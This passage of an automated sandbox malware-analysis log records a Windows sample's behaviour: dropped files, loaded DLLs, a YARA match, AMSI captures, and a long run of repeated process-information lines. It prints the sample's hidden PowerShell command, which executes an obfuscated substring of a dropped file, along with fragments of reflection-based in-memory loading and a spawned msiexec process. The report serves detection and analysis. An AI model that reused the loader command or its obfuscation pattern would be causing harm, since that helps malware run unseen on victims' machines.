    Source: C:\Users\user\Desktop\beNxougDFV.exeCode function: 0_2_004020CB CoCreateInstance,MultiByteToWideChar,0_2_004020CB
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile created: C:\Users\user\AppData\Local\unshabbilyJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile created: C:\Users\user\AppData\Local\Temp\nsa5748.tmpJump to behavior
    Source: beNxougDFV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: beNxougDFV.exeReversingLabs: Detection: 50%
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile read: C:\Users\user\Desktop\beNxougDFV.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\beNxougDFV.exe "C:\Users\user\Desktop\beNxougDFV.exe"
    Source: C:\Users\user\Desktop\beNxougDFV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Users\user\Desktop\beNxougDFV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: beNxougDFV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000007.00000002.2594806253.00000000084FA000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Ergotropic $Cornmuse18 $Autoophuggeren67), (Oligarchist204 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Offdayen = [AppDomain]::CurrentDomain.GetAssembl
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Totalforbydes)), $Stumfilmsklassikere60).DefineDynamicModule($Torpedobaade158, $false).DefineType($Apotekerkde, $Uviol, [System.Multic
    Source: C:\Users\user\Desktop\beNxougDFV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)"
    Source: C:\Users\user\Desktop\beNxougDFV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)"Jump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile created: C:\Users\user\AppData\Local\Temp\nsw599B.tmp\UserInfo.dllJump to dropped file
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile created: C:\Users\user\AppData\Local\Temp\nsw599B.tmp\Banner.dllJump to dropped file
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exeJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
